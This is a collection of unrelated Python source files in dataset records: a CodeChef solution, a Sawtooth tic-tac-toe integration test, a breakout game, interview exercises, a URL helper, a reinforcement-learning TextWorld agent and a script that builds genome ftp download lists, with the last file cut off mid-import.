+{"seq_id":"178612758","text":"from string import ascii_lowercase as lc\nnb_test = int(input())\nfor _ in range(nb_test):\n nb_chr, time_repeat = [int(x) for x in input().split()]\n alpha = lc[:nb_chr]\n exclude = input()\n ans = \"\"\n for i in alpha:\n if i not in exclude:\n ans += i\n print(ans * time_repeat)\n\n","sub_path":"codechef/BUGF18C.py","file_name":"BUGF18C.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"288839661","text":"# Copyright 2017 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ------------------------------------------------------------------------------\n\nimport os\nimport shlex\nimport logging\nimport unittest\nimport subprocess\n\nfrom sawtooth_integration.tests.integration_tools import XoClient\nfrom 
sawtooth_integration.tests.integration_tools import wait_for_rest_apis\n\n\nLOGGER = logging.getLogger(__name__)\nLOGGER.setLevel(logging.DEBUG)\n\n\nWAIT = 300\nREST_API = 'rest-api:8008'\n\n\nclass TestXoSmoke(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.client = XoClient('http://' + REST_API)\n wait_for_rest_apis([REST_API])\n\n def test_xo_smoke(self):\n for username in ('nunzio', 'tony'):\n _send_cmd('sawtooth keygen {}'.format(username))\n\n game_cmds = (\n 'xo create game-1 --username nunzio',\n 'xo take game-1 1 --username nunzio',\n 'xo take game-1 4 --username tony',\n 'xo take game-1 2 --username nunzio',\n 'xo take game-1 2 --username tony',\n 'xo take game-1 5 --username tony',\n 'xo create game-2 --username tony',\n 'xo take game-2 9 --username nunzio',\n 'xo take game-2 8 --username tony',\n 'xo take game-1 3 --username tony',\n 'xo take game-1 3 --username nunzio',\n 'xo take game-1 7 --username tony',\n 'xo take game-2 6 --username nunzio',\n 'xo create blank --username tony',\n )\n\n for cmd in game_cmds:\n _send_cmd(\n '{} --url {} --wait {}'.format(\n cmd,\n self.client.url,\n WAIT))\n\n self.assert_number_of_games(3)\n\n self.verify_game('game-1', 'XXXOO----', 'P1-WIN')\n self.verify_game('game-2', '-----X-OX', 'P2-NEXT')\n self.verify_game('blank', '---------', 'P1-NEXT')\n\n LOGGER.info(\n \"Verifying that XO CLI commands don't blow up (but nothing else)\")\n\n cli_cmds = (\n 'xo list',\n 'xo show game-1',\n 'xo show game-2',\n 'xo show blank',\n )\n\n for cmd in cli_cmds:\n _send_cmd(\n '{} --url {}'.format(\n cmd,\n self.client.url))\n\n if not _tp_supports_delete():\n LOGGER.warning('TP does not support state delete')\n return\n\n delete_cmds = (\n 'xo delete game-1 --username nunzio',\n 'xo delete blank --username tony',\n )\n\n for cmd in delete_cmds:\n _send_cmd(\n '{} --url {} --wait {}'.format(\n cmd,\n self.client.url,\n WAIT))\n\n _send_cmd('xo list --url {}'.format(self.client.url))\n\n self.assert_number_of_games(1)\n\n self.verify_game('game-2', '-----X-OX', 'P2-NEXT')\n\n self.assert_no_game('game-1')\n self.assert_no_game('blank')\n\n def verify_game(self, game_name, expected_board, expected_turn):\n LOGGER.info('Verifying game: %s', game_name)\n\n board, turn, _, _ = self.client.get_game(game_name)\n\n self.assertEqual(\n board,\n expected_board,\n 'Wrong board -- expected: {} -- actual: {}'.format(\n expected_board, board))\n\n self.assertEqual(\n turn,\n expected_turn,\n 'Wrong turn -- expected: {} -- actual: {}'.format(\n expected_turn, turn))\n\n def assert_number_of_games(self, number):\n self.assertEqual(\n len(self.client.get_data()),\n number)\n\n def assert_no_game(self, game_name):\n with self.assertRaises(Exception):\n self.client.get_game(game_name)\n\n\ndef _send_cmd(cmd_str):\n LOGGER.info('Sending %s', cmd_str)\n\n subprocess.run(\n shlex.split(cmd_str),\n check=True)\n\n\ndef _tp_supports_delete():\n supported_langs = ['python', 'go']\n\n lang = os.getenv('TP_LANG', None)\n if lang is not None:\n return lang in supported_langs\n\n return False\n","sub_path":"tests/sawtooth_integration/tests/test_xo_smoke.py","file_name":"test_xo_smoke.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"238859907","text":"\"\"\"\nOriginal code source:\n bricka (a breakout clone)\n\n\n Developed by Leonel Machava \n http://codeNtronix.com\n\"\"\"\nimport sys\nimport pygame\nfrom homework.HW_3.__main__.Constants import Constants as 
Consts\nfrom homework.HW_3.__main__.Levels import Levels\n\nCONSTANTS = Consts()\n\n\nclass Bricka:\n\n def __init__(self):\n pygame.init()\n \n self.screen = pygame.display.set_mode(CONSTANTS.SCREEN_SIZE)\n pygame.display.set_caption(\"bricka (a breakout clone by codeNtronix.com)\")\n \n self.clock = pygame.time.Clock()\n\n if pygame.font:\n self.font = pygame.font.Font(None,30)\n else:\n self.font = None\n\n self.init_game()\n\n \n def init_game(self):\n self.lives = 3\n self.score = 0\n self.state = CONSTANTS.STATE_BALL_IN_PADDLE\n\n self.ball_vel = CONSTANTS.BALL_VELOCITY\n self.levels = Levels()\n\n self.init_next_level()\n\n def init_next_level(self):\n self.lives = 3\n keep_going = self.levels.Load_Next_Level()\n if keep_going:\n self.bricks = self.levels.getBricks()\n self.paddle = pygame.Rect(300, CONSTANTS.PADDLE_Y, CONSTANTS.PADDLE_WIDTH, CONSTANTS.PADDLE_HEIGHT)\n self.ball = pygame.Rect(300, CONSTANTS.PADDLE_Y - CONSTANTS.BALL_DIAMETER, CONSTANTS.BALL_DIAMETER,\n CONSTANTS.BALL_DIAMETER)\n else:\n self.state = CONSTANTS.STATE_WON\n\n def draw_bricks(self):\n for brick in self.bricks:\n pygame.draw.rect(self.screen, brick.color, brick.rect)\n \n def check_input(self):\n\n self.checkForQuit()\n keys = pygame.key.get_pressed()\n \n if keys[pygame.K_LEFT]:\n self.paddle.left -= CONSTANTS.PADDLE_MOVE_INCREMENT\n if self.paddle.left < 0:\n self.paddle.left = 0\n\n if keys[pygame.K_RIGHT]:\n self.paddle.left += CONSTANTS.PADDLE_MOVE_INCREMENT\n if self.paddle.left > CONSTANTS.MAX_PADDLE_X:\n self.paddle.left = CONSTANTS.MAX_PADDLE_X\n\n if keys[pygame.K_SPACE] and self.state == CONSTANTS.STATE_BALL_IN_PADDLE:\n self.ball_vel = CONSTANTS.BALL_VELOCITY\n self.state = CONSTANTS.STATE_PLAYING\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n if(self.state == CONSTANTS.STATE_GAME_OVER or self.state == CONSTANTS.STATE_WON):\n self.init_game()\n elif(self.state == CONSTANTS.STATE_GET_NEXT_LEVEL):\n self.state = CONSTANTS.STATE_START_NEXT_LEVEL\n\n def move_ball(self):\n self.ball.left += self.ball_vel[0]\n self.ball.top += self.ball_vel[1]\n\n if self.ball.left <= 0:\n self.ball.left = 0\n self.ball_vel[0] = -self.ball_vel[0]\n elif self.ball.left >= CONSTANTS.MAX_BALL_X:\n self.ball.left = CONSTANTS.MAX_BALL_X\n self.ball_vel[0] = -self.ball_vel[0]\n \n if self.ball.top < 0:\n self.ball.top = 0\n self.ball_vel[1] = -self.ball_vel[1]\n elif self.ball.top >= CONSTANTS.MAX_BALL_Y:\n self.ball.top = CONSTANTS.MAX_BALL_Y\n self.ball_vel[1] = -self.ball_vel[1]\n\n def handle_collisions(self):\n for brick in self.bricks:\n if self.ball.colliderect(brick.rect):\n if brick.hits_to_break > 0:\n self.score += 3\n if (self.ball.right - self.ball_vel[0] <= brick.rect.left or self.ball.left - self.ball_vel[0] >= brick.rect.right) and (not (self.ball.bottom - 2 < brick.rect.top or self.ball.top + 2 > brick.rect.bottom)):\n self.ball_vel[0] = -self.ball_vel[0]\n else:\n self.ball_vel[1] = -self.ball_vel[1]\n\n brick.onHit()\n if brick.hits_to_break == 0:\n self.bricks.remove(brick)\n break\n\n temp_state = self.state\n self.state = CONSTANTS.STATE_GET_NEXT_LEVEL\n for brick in self.bricks:\n if brick.hits_to_break > 0:\n self.state = temp_state\n else:\n continue\n\n \n if self.ball.colliderect(self.paddle):\n self.ball.top = CONSTANTS.PADDLE_Y - CONSTANTS.BALL_DIAMETER\n self.ball_vel[1] = -self.ball_vel[1]\n if (self.ball.left + CONSTANTS.BALL_RADIUS < self.paddle.left + (CONSTANTS.PADDLE_WIDTH // 2)):\n self.ball_vel[0] = 
-abs(self.ball_vel[0])\n else:\n self.ball_vel[0] = abs(self.ball_vel[0])\n\n elif self.ball.top > self.paddle.top:\n self.lives -= 1\n if self.lives > 0:\n self.state = CONSTANTS.STATE_BALL_IN_PADDLE\n else:\n self.state = CONSTANTS.STATE_GAME_OVER\n\n def show_stats(self):\n if self.font:\n font_surface = self.font.render(\"SCORE: \" + str(self.score) + \" LIVES: \" + str(self.lives), False, CONSTANTS.WHITE)\n self.screen.blit(font_surface, (205,5))\n\n def show_message(self,message):\n if self.font:\n size = self.font.size(message)\n font_surface = self.font.render(message,False, CONSTANTS.WHITE)\n x = (CONSTANTS.SCREEN_SIZE[0] - size[0]) / 2\n y = (CONSTANTS.SCREEN_SIZE[1] - size[1]) / 2\n self.screen.blit(font_surface, (x,y))\n\n def terminate(self):\n print(\"terminating\")\n pygame.quit()\n sys.exit()\n\n def checkForQuit(self):\n for event in pygame.event.get(pygame.QUIT): # get all the QUIT events\n self.terminate() # terminate if any QUIT events are present\n for event in pygame.event.get(pygame.KEYUP): # get all the KEYUP events\n if event.key == pygame.K_ESCAPE:\n self.terminate() # terminate if the KEYUP event was for the Esc key\n pygame.event.post(event) # put the other KEYUP event objects back\n \n \n def run(self):\n while 1:\n\n self.clock.tick(50)\n self.screen.fill(CONSTANTS.BLACK)\n self.check_input()\n\n self.checkForQuit()\n\n if self.state == CONSTANTS.STATE_PLAYING:\n self.move_ball()\n self.handle_collisions()\n elif self.state == CONSTANTS.STATE_BALL_IN_PADDLE:\n self.ball.left = self.paddle.left + self.paddle.width / 2\n self.ball.top = self.paddle.top - self.ball.height\n self.show_message(\"PRESS SPACE TO LAUNCH THE BALL\")\n elif self.state == CONSTANTS.STATE_GAME_OVER:\n self.show_message(\"GAME OVER. PRESS ENTER TO PLAY AGAIN\")\n elif self.state == CONSTANTS.STATE_WON:\n self.show_message(\"YOU WON! PRESS ENTER TO PLAY AGAIN\")\n elif self.state == CONSTANTS.STATE_GET_NEXT_LEVEL:\n self.show_message(\"LEVEL COMPLETE! 
PRESS ENTER TO CONTINUE!\")\n elif self.state == CONSTANTS.STATE_START_NEXT_LEVEL:\n self.init_next_level()\n\n self.draw_bricks()\n\n # Draw paddle\n pygame.draw.rect(self.screen, CONSTANTS.BLUE, self.paddle)\n\n\n # Draw ball\n pygame.draw.circle(self.screen, CONSTANTS.WHITE, (self.ball.left + CONSTANTS.BALL_RADIUS, self.ball.top + CONSTANTS.BALL_RADIUS), CONSTANTS.BALL_RADIUS)\n\n self.show_stats()\n\n pygame.display.flip()\n\nif __name__ == \"__main__\":\n Bricka().run()\n","sub_path":"homework/HW_3/bricka.py","file_name":"bricka.py","file_ext":"py","file_size_in_byte":7658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"414473686","text":"#\n\n# Define a List with a few negative and positive numbers.\n# Using list comprehensions, obtain the square values for only the positive numbers from the original list\n\nmy_list = [1, -2, 3, -4, 6]\nnew_list = (x ** 2 for x in my_list if x > 0)\n\n# print(new_list)\n\n# (0, 1), (2, 3) … (N-1, N)\n#\n# E.g.\n# N=5\n# (0, 1), (2, 3), (4, 5)\n# N=4\n# (0, 1), (2, 3)\n\n# next - >\n\n\ndef my_generato(N):\n i, j = 0, 1\n while j <= N:\n yield (i, j)\n i += 2\n j += 2\n\n\n# for val in my_generato(5):\n# print(val)\n\n\n# Interviewer\n# - work_start : datetime\n# - work_end : datetime\n# - booked_events: Event[]\n#\n#\n# Event:\n# - start: datetime\n# - duration: int # seconds\n\nfrom datetime import timedelta, datetime\n\n\nclass Interviewer:\n\n def __init__(self, work_start, work_end):\n self.work_start = work_start\n self.work_end = work_end\n self.booked_events = []\n\n def add_event(self, event):\n result = False\n if event.start >= self.work_start and event.end <= self.work_end:\n # O(n) -> O(log n)\n has_overlap = False\n for booked_event in self.booked_events:\n if booked_event.start <= event.start <= booked_event.end or \\\n booked_event.start <= event.end <= booked_event.end or \\\n (booked_event.start > event.start and booked_event.end < event.end):\n has_overlap = True\n break\n else:\n self.booked_events.append(event)\n return True\n\n return False\n\n\nclass Event:\n\n def __init__(self, start, duration: timedelta):\n self.start = start\n self.duration = duration\n self.end = start + duration\n\n\n##############################################\n# Round 2\n\n\n\n\n\n\ndef n_uniq_max(given_list, n):\n if n > len(given_list):\n return 0\n\n val_list = list(set(given_list))\n val_list.sort()\n\n result = sum(val_list[-n:])\n\n return result\n\n\ndef n_uniq_max_2(given_list, n):\n if n > len(given_list):\n return 0\n\n val_dic = {key: 0 for key in given_list}\n\n if n > len(val_dic.keys()):\n n = len(val_dic.keys())\n\n max_list = list(val_dic.keys())[:n]\n current_min = max_list[0]\n for val in max_list:\n if current_min > val:\n current_min = val\n\n for key in list(val_dic.keys())[n:]:\n if key > current_min:\n for i in range(len(max_list)):\n if max_list[i] == current_min:\n max_list[i] = key\n\n current_min = max_list[0]\n for val in max_list:\n if current_min > val:\n current_min = val\n\n result = 0\n for val in max_list:\n result += val\n\n return result\n\n\nimport time\n\ndef timeit(temed):\n\n def decorted(*args, **kargs):\n start_time = time.perf_counter()\n result = temed(*args, **kargs)\n print(f\"Execution_time = {time.perf_counter() - start_time} ms\")\n return result\n\n decorted.__name__ = temed.__name__\n return decorted\n\n\n@timeit\ndef fibonachi(n):\n if n < 2:\n return n\n\n result = 1\n prev = 0\n current = 1\n for i in range(2, n + 1):\n prev, current = 
current, prev + current\n result += current\n\n return result\n\n# print(fibonachi(100))\n\n\n# print(n_uniq_max_2( [1,2,3,7,23,99,1,2,4,1,15,6,4,99], 3))\n\n\nfrom datetime import date\n\n\nclass Person:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n # a class method to create a Person object by birth year.\n\n @classmethod\n def fromBirthYear(cls, name, year):\n return cls(name, date.today().year - year)\n\n # a static method to check if a Person is adult or not.\n\n @staticmethod\n def isAdult(age):\n return age > 18\n\n\nperson1 = Person('mayank', 21)\nperson2 = Person.fromBirthYear('mayank', 1996)\n\nprint(person1.age)\nprint(person2.age)\n\n# print the result\nprint(Person.isAdult(22))\n\n","sub_path":"Companies/Upstack.py","file_name":"Upstack.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"343181431","text":"#!/usr/bin/env python\n# -*- encoding:utf-8 -*-\n\n# Author: lixingtie\n# Email: lixingtie@barfoo.com.cn\n# Create Date: 2012-12-13\n\ndef url(handler, url):\n \"\"\"\n Generate the URL, carrying over the current request's query arguments.\n \"\"\"\n if not handler.request.arguments:\n return url\n\n kvs = [ \"{0}={1}\".format(k, handler.get_argument(k)) for k, v in handler.request.arguments.items() ]\n\n if \"?\" in url:\n qs = url[url.index(\"?\") + 1:]\n url = url[:url.index(\"?\")]\n for kv in qs.split(\"&\"):\n kvs.append('%s=%s' % tuple(kv.split('=', 1)))\n\n return \"%s?%s\" % (url, \"&\".join(kvs))\n","sub_path":"framework/web/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"37919303","text":"from collections import defaultdict\nfrom os.path import join as pjoin\nfrom time import time\nfrom glob import glob\nfrom typing import Mapping, Any, Optional\nimport re\nimport numpy as np\nimport os\nimport gym\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\nfrom textworld import EnvInfos\nimport textworld.gym\nfrom gg_pretrained import ggModel\n\n#device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\ndevice = torch.device(\"cpu\")\n\nclass ActorzCritic(nn.Module):\n\n eps = 0.01\n\n def __init__(self, input_size, hidden_size):\n super(ActorzCritic, self).__init__()\n torch.manual_seed(42) # For reproducibility\n self.embedding = nn.Embedding(input_size, hidden_size)\n self.encoder_gru = nn.GRU(hidden_size, hidden_size)\n self.cmd_encoder_gru = nn.GRU(hidden_size, hidden_size)\n self.state_gru = nn.GRU(hidden_size, hidden_size)\n\n self.linear_1 = nn.Linear(2 * hidden_size, 2 * hidden_size)\n self.critic = nn.Linear(hidden_size, 1)\n self.actor = nn.Linear(hidden_size * 2, 1)\n\n # Parameters\n self.state_hidden = torch.zeros(1, 1, hidden_size, device=device)\n self.hidden_size = hidden_size\n\n def forward(self, obs, commands, mode, method):\n input_length, batch_size = obs.size(0), obs.size(1)\n nb_cmds = commands.size(1)\n\n embedded = self.embedding(obs)\n encoder_output, encoder_hidden = self.encoder_gru(embedded)\n\n state_output, state_hidden = self.state_gru(encoder_hidden, self.state_hidden)\n self.state_hidden = state_hidden\n state_value = self.critic(state_output)\n\n # Attention network over the commands.\n cmds_embedding = self.embedding.forward(commands)\n _, cmds_encoding_last_states = self.cmd_encoder_gru.forward(cmds_embedding) # 1*cmds*hidden\n\n # Same observed state for all commands.\n cmd_selector_input = 
torch.stack([state_hidden] * nb_cmds, 2) # 1*batch*cmds*hidden\n\n # Same command choices for the whole batch.\n cmds_encoding_last_states = torch.stack([cmds_encoding_last_states] * batch_size, 1) # 1*batch*cmds*hidden\n\n # Concatenate the observed state and command encodings.\n input_ = torch.cat([cmd_selector_input, cmds_encoding_last_states], dim=-1)\n\n # One FC layer\n x = F.relu(self.linear_1(input_))\n\n # Compute state-action value (score) per command.\n action_state = F.relu(self.actor(x)).squeeze(-1) # 1 x Batch x cmds\n # action_state = F.relu(self.actor(input_)).squeeze(-1) # 1 x Batch x cmds\n\n probs = F.softmax(action_state, dim=2) # 1 x Batch x cmds\n\n if mode == \"train\":\n action_index = probs[0].multinomial(num_samples=1).unsqueeze(0) # 1 x batch x indx\n elif mode == \"test\":\n if method == 'random':\n action_index = probs[0].multinomial(num_samples=1).unsqueeze(0) # 1 x batch x indx\n elif method == 'arg-max':\n action_index = probs[0].max(1).indices.unsqueeze(-1).unsqueeze(-1) # 1 x batch x indx\n elif method == 'eps-soft':\n index = probs[0].max(1).indices.unsqueeze(-1).unsqueeze(-1)\n p = np.random.random()\n if p < (1 - self.eps + self.eps / nb_cmds):\n action_index = index\n else:\n while True:\n tp = np.random.choice(probs[0][0].detach().numpy())\n if (probs[0][0] == tp).nonzero().unsqueeze(-1) != index:\n action_index = (probs[0][0] == tp).nonzero().unsqueeze(-1)\n break\n\n return action_state, action_index, state_value\n\n def reset_hidden(self, batch_size):\n self.state_hidden = torch.zeros(1, batch_size, self.hidden_size, device=device)\n\nclass NeuralAgent:\n \"\"\" Simple Neural Agent for playing TextWorld games. \"\"\"\n\n MAX_VOCAB_SIZE = 1000\n UPDATE_FREQUENCY = 10\n LOG_FREQUENCY = 1000\n GAMMA = 0.9\n\n def __init__(self) -> None:\n self.id2word = [\"\", \"\"]\n self.word2id = {w: i for i, w in enumerate(self.id2word)}\n\n self.model = ActorzCritic(input_size=self.MAX_VOCAB_SIZE, hidden_size=128)\n self.optimizer = optim.Adam(self.model.parameters(), 0.00003)\n\n def train(self):\n self.mode = \"train\"\n self.method = \"random\"\n self.transitions = []\n self.last_score = 0\n self.no_train_step = 0\n self.stats = {\"max\": defaultdict(list), \"mean\": defaultdict(list)}\n self.memo = {\"max\": defaultdict(list), \"mean\": defaultdict(list), \"mem\": defaultdict(list)}\n self.model.reset_hidden(1)\n\n def test(self, method):\n self.mode = \"test\"\n self.method = method\n self.model.reset_hidden(1)\n\n @property\n def infos_to_request(self) -> EnvInfos:\n return EnvInfos(description=True, inventory=True, admissible_commands=True, won=True, lost=True)\n\n def act(self, obs: str, score: int, gg_score: float, nb_moves:int, done: bool, infos: Mapping[str, Any]) -> Optional[str]:\n # Build agent's observation: feedback + look + inventory.\n input_ = \"{}\\n{}\\n{}\".format(obs, infos[\"description\"], infos[\"inventory\"])\n\n # Tokenize and pad the input and the commands to chose from.\n input_tensor = self._process([input_])\n commands_tensor = self._process(infos[\"admissible_commands\"])\n\n # Get our next action and value prediction.\n outputs, indexes, values = self.model(input_tensor, commands_tensor, mode=self.mode, method=self.method)\n action = infos[\"admissible_commands\"][indexes[0]]\n\n if self.mode == \"test\":\n if done:\n self.model.reset_hidden(1)\n return action\n\n self.no_train_step += 1\n\n if self.transitions:\n reward = score - self.last_score # Reward is the gain/loss in score.\n self.last_score = score\n reward += gg_score\n 
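# apply a small per-move penalty so the agent favours shorter episodes\n 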
reward = reward - (nb_moves *0.1)\n# print(\"reward: \", reward)\n if infos[\"won\"]:\n reward += 100\n if infos[\"lost\"]:\n reward -= 100\n\n self.transitions[-1][0] = reward # Update reward information.\n\n self.stats[\"max\"][\"score\"].append(score)\n self.memo[\"max\"][\"score\"].append(score)\n\n if self.no_train_step % self.UPDATE_FREQUENCY == 0:\n # Update model\n returns, advantages = self._discount_rewards(values)\n\n loss = 0\n for transition, ret, advantage in zip(self.transitions, returns, advantages):\n reward, indexes_, outputs_, values_ = transition\n\n advantage = advantage.detach() # Block gradients flow here.\n probs = F.softmax(outputs_, dim=2)\n log_probs = torch.log(probs)\n log_action_probs = log_probs.gather(2, indexes_)\n policy_loss = (log_action_probs * advantage).sum()\n value_loss = ((values_ - ret) ** 2.).sum()\n entropy = (-probs * log_probs).sum()\n loss += 0.5 * value_loss - policy_loss - 0.001 * entropy\n\n self.memo[\"mem\"][\"selected_action_index\"].append(indexes_.item())\n self.memo[\"mem\"][\"state_val_func\"].append(values_.item())\n self.memo[\"mem\"][\"advantage\"].append(advantage.item())\n self.memo[\"mem\"][\"return\"].append(ret.item())\n self.memo[\"mean\"][\"reward\"].append(reward)\n self.memo[\"mean\"][\"policy_loss\"].append(policy_loss.item())\n self.memo[\"mean\"][\"value_loss\"].append(value_loss.item())\n\n self.stats[\"mean\"][\"reward\"].append(reward)\n self.stats[\"mean\"][\"policy_loss\"].append(policy_loss.item())\n self.stats[\"mean\"][\"value_loss\"].append(value_loss.item())\n self.stats[\"mean\"][\"entropy\"].append(entropy.item())\n self.stats[\"mean\"][\"confidence\"].append(torch.exp(log_action_probs).item())\n\n if self.no_train_step % self.LOG_FREQUENCY == 0:\n msg = \"{}. \".format(self.no_train_step)\n msg += \" \".join(\"{}: {:.3f}\".format(k, np.mean(v)) for k, v in self.stats[\"mean\"].items())\n msg += \" \" + \" \".join(\"{}: {}\".format(k, np.max(v)) for k, v in self.stats[\"max\"].items())\n msg += \" vocab: {}\".format(len(self.id2word))\n print(msg)\n self.stats = {\"max\": defaultdict(list), \"mean\": defaultdict(list)}\n\n self.optimizer.zero_grad()\n loss.backward()\n nn.utils.clip_grad_norm(self.model.parameters(), 40)\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n self.transitions = []\n self.model.reset_hidden(1)\n else:\n # Keep information about transitions for Truncated Backpropagation Through Time.\n self.transitions.append([None, indexes, outputs, values]) # Reward will be set on the next call\n\n if done:\n self.last_score = 0 # Will be starting a new episode. 
Reset the last score.\n\n return action\n\n def _process(self, texts):\n texts = list(map(self._tokenize, texts))\n max_len = max(len(l) for l in texts)\n padded = np.ones((len(texts), max_len)) * self.word2id[\"\"]\n\n for i, text in enumerate(texts):\n padded[i, :len(text)] = text\n\n padded_tensor = torch.from_numpy(padded).type(torch.long).to(device)\n padded_tensor = padded_tensor.permute(1, 0) # Batch x Seq => Seq x Batch\n return padded_tensor\n\n def _tokenize(self, text):\n # Simple tokenizer: strip out all non-alphabetic characters.\n text = re.sub(\"[^a-zA-Z0-9\\- ]\", \" \", text)\n word_ids = list(map(self._get_word_id, text.split()))\n return word_ids\n\n def _get_word_id(self, word):\n if word not in self.word2id:\n if len(self.word2id) >= self.MAX_VOCAB_SIZE:\n return self.word2id[\"\"]\n\n self.id2word.append(word)\n self.word2id[word] = len(self.word2id)\n\n return self.word2id[word]\n\n def _discount_rewards(self, last_values):\n returns, advantages = [], []\n R = last_values.data\n for t in reversed(range(len(self.transitions))):\n rewards, _, _, values = self.transitions[t]\n R = rewards + self.GAMMA * R\n adv = R - values\n returns.append(R)\n advantages.append(adv)\n\n return returns[::-1], advantages[::-1]\n\n\ndef play(agent, gg_premodel, path, max_step=50, nb_episodes=10, verbose=True):\n \"\"\"\n This code uses the cooking agent design in the spaceship game.\n\n :param agent: the obj of NeuralAgent, a sample object for the agent\n :param path: The path to the game (envo model)\n \"\"\"\n\n infos_to_request = agent.infos_to_request\n infos_to_request.max_score = True # Needed to normalize the scores.\n\n gamefiles = [path]\n if os.path.isdir(path):\n gamefiles = glob(os.path.join(path, \"*.ulx\"))\n\n env_id = textworld.gym.register_games(gamefiles,\n request_infos=infos_to_request,\n max_episode_steps=max_step)\n env = gym.make(env_id) # Create a Gym environment to play the text game.\n\n if verbose:\n if os.path.isdir(path):\n print(os.path.dirname(path), end=\"\")\n else:\n print(os.path.basename(path), end=\"\")\n\n # Collect some statistics: nb_steps, final reward.\n avg_moves, avg_scores, avg_norm_scores, seed_h = [], [], [], 4567\n for no_episode in range(nb_episodes):\n print(\"episode: \", no_episode)\n obs, infos = env.reset() # Start new episode.\n\n env.env.textworld_env._wrapped_env.seed(seed=seed_h)\n seed_h += 1\n\n score = 0\n gg_score = 0\n done = False\n nb_moves = 0\n while not done:\n command = agent.act(obs, score, gg_score, nb_moves, done, infos)\n print(\"command -> \", command)\n obs, score, done, infos = env.step(command)\n gg_result = gg_premodel.get_score(command)\n gg_score = gg_result[0][1] * 0.1\n# if gg_result[0][1] < 0:\n# gg_score = -0.25\n# else:\n# gg_score = 0.25\n nb_moves += 1\n agent.act(obs, score, gg_score, nb_moves, done, infos) # Let the agent know the game is done.\n\n if verbose:\n print(\".\", end=\"\")\n avg_moves.append(nb_moves)\n avg_scores.append(score)\n avg_norm_scores.append(score / infos[\"max_score\"])\n print(\"episode_score: \",score)\n\n env.close()\n msg = \" \\tavg. steps: {:5.1f}; avg. 
score: {:4.1f} / {}.\"\n if verbose:\n if os.path.isdir(path):\n print(msg.format(np.mean(avg_moves), np.mean(avg_norm_scores), 1))\n else:\n print(avg_scores)\n print(msg.format(np.mean(avg_moves), np.mean(avg_scores), infos[\"max_score\"]))\n\ngame_path = \"./tw_games/super_hero_1.ulx\"\nagent = NeuralAgent()\ngg_model = ggModel()\nstep_size = 750\n\nprint(\" ===== Training ===================================================== \")\nagent.train() # Tell the agent it should update its parameters.\nstart_time = time()\n# print(os.path.realpath(\"./games/levelMedium_v1.ulx\"))\nprint(os.path.realpath(game_path))\n# play(agent, \"./games/levelMedium_v1.ulx\", max_step=step_size, nb_episodes=2000, verbose=False)\nplay(agent, gg_model, game_path, max_step=step_size, nb_episodes=2000, verbose=False)\nprint(\"Trained in {:.2f} secs\".format(time() - start_time))\n\nprint(' ===== Test ========================================================= ')\nagent.test(method='random')\n# play(agent, \"./games/levelMedium_v1.ulx\", max_step=step_size) # Medium level game.\nplay(agent, gg_model, game_path, max_step=step_size) # Medium level game.\n\nsave_path = \"./model/levelMedium_v1_random.npy\"\nif not os.path.exists(os.path.dirname(save_path)):\n os.mkdir(os.path.dirname(save_path))\n\nnp.save(save_path, agent)","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":14214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"164376711","text":"#This script will pull out each ftp address in the file\n#make a new file called [genome_id_ftp_download.txt]\n#that will eventually be fed into a wget -i script \n#so that I can download all of the genomes from ENA\n#Katie Brennan 2016-09-19\n\nimport os\nimport sys\nimport glob\nimport re\n\ninitial_dir = os.getcwd()\nftp_dir = initial_dir + '/he_cdif_ftp_directions'\n\nENA_dir = initial_dir + '/ENA_paths'\ni=0\n\n#r = re.compile(r\"\\b\\ftp.sra.ebi.ac.uk\\w*\\b\")\n#r = re.compile(r\"\\b\\w*ft\\w*\\b\")\n\nos.chdir(ENA_dir)\nfor file in glob.glob(\"*.txt\"):\n with open(file, 'r') as ENA_file:\n file_list = []\n for line in ENA_file:\n words = line.split() #words are now strings in a list\n for word in words:\n if \"ftp.sra.ebi.ac.uk\" in word:\n all_words = word.split(\";\")\n for wrd in all_words:\n file_list.append(wrd)\n file_list = set(file_list)\n genome = os.path.basename(file)\n genome_id = genome[:-4]\n genome_file = ftp_dir + '/'+genome_id+'_ftp_download.txt'\n with open(genome_file,'a') as gf:\n for item in file_list:\n gf.write('ftp://') \n gf.write(item)\n gf.write('\\n')\n \nprint(i)\n # genome_id = str(ENA_file)\n # genome_id = genome_id[:-4] #removing .txt from id name\n # genome_file = ftp_dir + '/' + genome_id + '/_ftp_download.txt'\n # with open(genome_file,'a') as genome:\n # for line in ENA_file:\n # if 'ftp' in line: \n # genome.write('ftp://'+line)\n\n \n","sub_path":"2016-cdiff/2016-09-19-He-genomes-download/cdif_rename_ENA_ftp.py","file_name":"cdif_rename_ENA_ftp.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"31007326","text":"# Standard modules\nimport logging\nimport math\nimport os\nfrom datetime import datetime as dt\n\n# External modules\nimport opendssdirect\nimport pandas as pd\nimport pickle\n\n# Internal modules\nfrom dssmetrics.abstract_metrics import Metric\nfrom dssmetrics.constants import 